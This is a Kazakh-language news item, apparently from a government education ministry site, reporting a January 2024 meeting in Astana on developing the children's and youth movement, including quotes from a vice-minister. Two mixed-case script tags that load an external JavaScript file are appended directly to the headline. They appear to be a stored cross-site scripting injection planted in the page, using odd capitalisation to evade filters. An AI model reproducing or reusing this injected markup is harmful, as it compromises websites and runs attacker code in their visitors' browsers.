ЕЛІМІЗДЕГІ БАЛАЛАР МЕН ЖАСӨСПІРІМДЕР ҚОЗҒАЛЫСЫН ДАМЫТУ МӘСЕЛЕЛЕРІ ТАЛҚЫЛАНДЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.01.2024

Астанада балалар мен жасөспірімдер қозғалысын дамыту мәселелері бойынша кездесу өтті. Оған Оқу-ағарту вице-министрі Еділ Оспан қатысты. Сондай-ақ, кездесуге педагогтар, азаматтық қоғам өкілдері мен блогерлер қатысты.

💬«Балалар мен жасөспірімдер қозғалысының басты мақсаты - өскелең ұрпақтың бойындағы патриоттық сезімді күшейту, жалпыадамзаттық және ұлттық құндылықтарды дәріптеу, әр іске жауапкершілікпен қарауға баулу. Балалар мен жасөспірімдер қозғалысының негізгі бағыттары - мәдени-ағартушылық және туристік, экологиялық-өлкетану»,- деп атап өтті Еділ Оспан.

🗣️Кездесу барысында еліміздегі балалар мен жасөспірімдер қозғалысын дамытудың бірыңғай тәсілдерін әзірлеу туралы сындарлы диалог өтті. 📝Жиынға қатысушылар балалар мен жастарды қоғамдық маңызы бар жобаларға кеңінен тартуға, шығармашылық бастамаларды қолдауға, сондай-ақ өскелең ұрпақ арасында көшбасшылық қасиеттерді дамытуға баса назар аудара отырып, балалар мен жасөспірімдер қозғалысын жетілдіру жолдарын ұсынды. ☑️Кездесу соңында оқушылар арасында түрлі іс-шараларды өткізуде жүйелілікті қамтамасыз ету мәселесін бірлесіп пысықтау, балалар мен жасөспірімдер қозғалысы мүшелерінің бірлескен іс-қимылын үйлестіру шараларын айқындау туралы шешім қабылданды.

Просмотров: 404


Пікір қосу



Деректерді қолтаңбаға қосу